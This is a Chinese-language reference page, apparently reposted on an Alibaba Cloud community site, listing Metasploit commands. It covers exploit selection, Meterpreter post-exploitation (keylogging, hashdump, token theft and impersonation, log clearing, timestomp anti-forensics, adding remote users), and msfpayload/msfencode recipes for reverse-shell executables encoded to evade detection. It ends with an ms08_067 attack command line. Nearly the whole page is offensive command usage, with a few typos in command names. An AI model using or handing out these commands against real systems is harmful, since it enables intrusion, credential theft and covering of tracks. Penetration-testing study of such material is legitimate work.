metasploit(MSF)終端命令大全

來源:互聯網
上載者:User

標籤:grep   top   賬戶   str   target   clear   cti   man   輸出   

show exploits

列出metasploit架構中的所有滲透攻擊模組。
show payloads

列出metasploit架構中的所有攻擊載荷。
show auxiliary

列出metasploit架構中的所有輔助攻擊載荷。
search name

尋找metasploit架構中所有的滲透攻擊和其他模組。
info

展示出制定滲透攻擊或模組的相關資訊。
use name

裝載一個滲透攻擊或模組。
LHOST

你本地可以讓目標主機串連的IP地址,通常當目標主機不在同一個區域網路內時,就需要是一個公用IP地址,特別為反彈式shell使用。
RHOST

遠程主機或是目標主機。
set function

設定特定的配置參數(EG:設定本地或遠程主機參數)。
setg function

以全域方式設定特定的配置參數(EG:設定本地或遠程主機參數)。
show options

列出某個滲透攻擊或模組中所有的配置參數。
show targets

列出滲透攻擊所有支援的目標平台。
set target num

指定你所知道的目標的作業系統以及補丁版本類型。
set payload name

指定想要使用的攻擊載荷。
show advanced

列出所有進階配置選項。
set autorunscript migrate -f.

在滲透攻擊完成後,將自動遷移到另一個進程。
check

檢測目標是否選定滲透攻擊存在相應的安全性漏洞。
exploit

執行滲透攻擊或模組來攻擊目標。
exploit -j

在計劃任務下進行滲透攻擊(攻擊將在後台進行)。
exploit -z

滲透攻擊完成後不與回話進行互動。
exploit -e encoder

制定使用的攻擊載荷編碼方式(EG:exploit -e shikata_ga_nai)。
exploit -h

列出exploit命令的協助資訊。
sessions -l

列出可用的互動會話(在處理多個shell時使用)。
sessions -l -v

列出所有可用的互動會話以及詳細資料,EG:攻擊系統時使用了哪個安全性漏洞。
sessions -s script

在所有活躍的metasploit會話中運行一個特定的metasploit指令碼。
sessions -K

殺死所有活躍的互動會話。
sessions -c cmd

在所有活躍的metasploit會話上執行一個命令。
sessions -u sessionID

升級一個普通的win32 shell到metasploit shell。
db_create name

建立一個資料庫驅動攻擊所要使用的資料庫(EG:db_create autopwn)。
db_connect name

建立並串連一個資料庫驅動攻擊所要使用的資料庫(EG:db_connect user:[email protected]/sqlname)。
db_namp

利用nmap並把掃描資料存放區到資料庫中(支援普通的nmap語句,EG:-sT -v -P0)。
db_autopwn -h

展示出db_autopwn命令的協助資訊。
db_autopwn -p -r -e

對所有發現的開放連接埠執行db_autopwn,攻擊所有系統,並使用一個反彈式shell。
db_destroy

刪除當前資料庫。
db_destroy user:[email protected]:port/database

使用進階選項來刪除資料庫。
***metasploit命令***

help

開啟meterpreter使用協助。
run scriptname

運行meterpreter指令碼,在scripts/meterpreter目錄下可查看到所有指令碼名。
sysinfo

列出受控主機的系統資訊。
ls

列出目標主機的檔案和檔案夾資訊。
use priv

載入權限提高擴充模組,來擴充metasploit庫。
ps

顯示所有啟動並執行進程以及相關聯的使用者賬戶。
migrate PID

遷移到一個指定的進程ID(PID號可通過ps命令從主機上獲得)。
use incognito

載入incognito功能(用來盜竊目標主機的令牌或假冒使用者)
list_tokens -u

列出目標主機使用者的可用令牌。
list_tokens -g

列出目標主機使用者組的可用令牌。
impersonate_token DOMAIN_NAME\USERNAME

假冒目標主機上的可用令牌。
steal_token PID

盜竊給定進程的可用令牌並進行令牌假冒。
drop_token

停止假冒當前令牌。
getsystem

通過各種攻擊向量來提升系統使用者權限。
execute -f cmd.exe -i

執行cmd.exe命令並進行互動。
execute -f cmd.exe -i -t

以所有可用令牌來執行cmd命令並隱藏該進程。
rev2self

回到控制目標主機的初始使用者賬戶下。
reg command

在目標主機註冊表中進行互動,建立,刪除,查詢等操作。
setdesktop number

切換到另一個使用者介面(該功能基於那些使用者已登入)。
screenshot

對目標主機的螢幕進行。
upload file

向目標主機上傳檔案。
download file

從目標主機下載檔案。
keyscan_start

針對遠程目標主機開啟鍵盤記錄功能。
keyscan_dump

儲存目標主機上捕獲的鍵盤記錄。
keyscan_stop

停止針對目標主機的鍵盤記錄。
getprivs

儘可能多的擷取目標主機上的特權。
uictl enable keyboard/mouse

接管目標主機的鍵盤和滑鼠。
background

將你當前的metasploit shell轉為後台執行。
hashdump

匯出目標主機中的口令雜湊值。
use sniffer

載入嗅探模式。
sniffer_interfaces

列出目標主機所有開放的網路連接埠。
sniffer_dump interfaceID pcapname

在目標主機上啟動嗅探。
sniffer_start interfaceID packet-buffer

在目標主機上針對特定範圍的資料包緩衝區啟動嗅探。
sniffer_stats interfaceID

擷取正在實施嗅探網路介面的統計資料。
sniffer_stop interfaceID

停止嗅探。
add_user username password -h ip

在遠程目標主機上添加一個使用者。
clearev

清楚目標主機上的日誌記錄。
timestomp

修改檔案屬性,例如修改檔案的建立時間(反取證調查)。
reboot

重啟目標主機。
***MSFpayload命令***

msfpayload -h

msfpayload的協助資訊。
msfpayload windows/meterpreter/bind_tcp O

列出所有windows/meterpreter/bind_tcp下可用的攻擊載荷的配置項(任何攻擊載荷都是可用配置的)。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe

建立一個metasploit的reverse_tcp攻擊載荷,回連到LHOSTip的LPORT,將其儲存為名為payload.exe的windows下可執行程式。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw

建立一個metasploit的reverse_tcp攻擊載荷,回連到LHOSTip的LPORT,將其儲存為名為payload.raw,該檔案後面的msffencode中使用。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c

建立一個metasploit的reverse_tcp攻擊載荷,匯出C格式的shellcode。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java

建立一個metasploit的reverse_tcp攻擊載荷,匯出成以%u編碼方式的javaScript語言字串。
***msfencode命令***

mefencode -h

列出msfencode的協助命令。
msfencode -l

列出所有可用的編碼器。
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)

顯示編碼緩衝區的格式。
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

使用shikata_ga_nai編碼器對payload.raw檔案進行5編碼,然後匯出一個名為encoded_payload.exe的檔案。
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

建立一個經過多種編碼格式嵌套編碼的攻擊載荷。
msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c

建立一個純字母數位shellcode,由ESI寄存器只想shellcode,以C語言格式輸出。
***MSFcli命令***

msfcli | grep exploit

僅列出滲透攻擊模組。
msfcli | grep exploit/windows

僅列出與windows相關的滲透攻擊模組。
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E

對IP發起ms08_067_netapi滲透攻擊,配置了bind_tcp攻擊載荷,並綁定在PORT連接埠進行監聽。

metasploit(MSF)終端命令大全

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.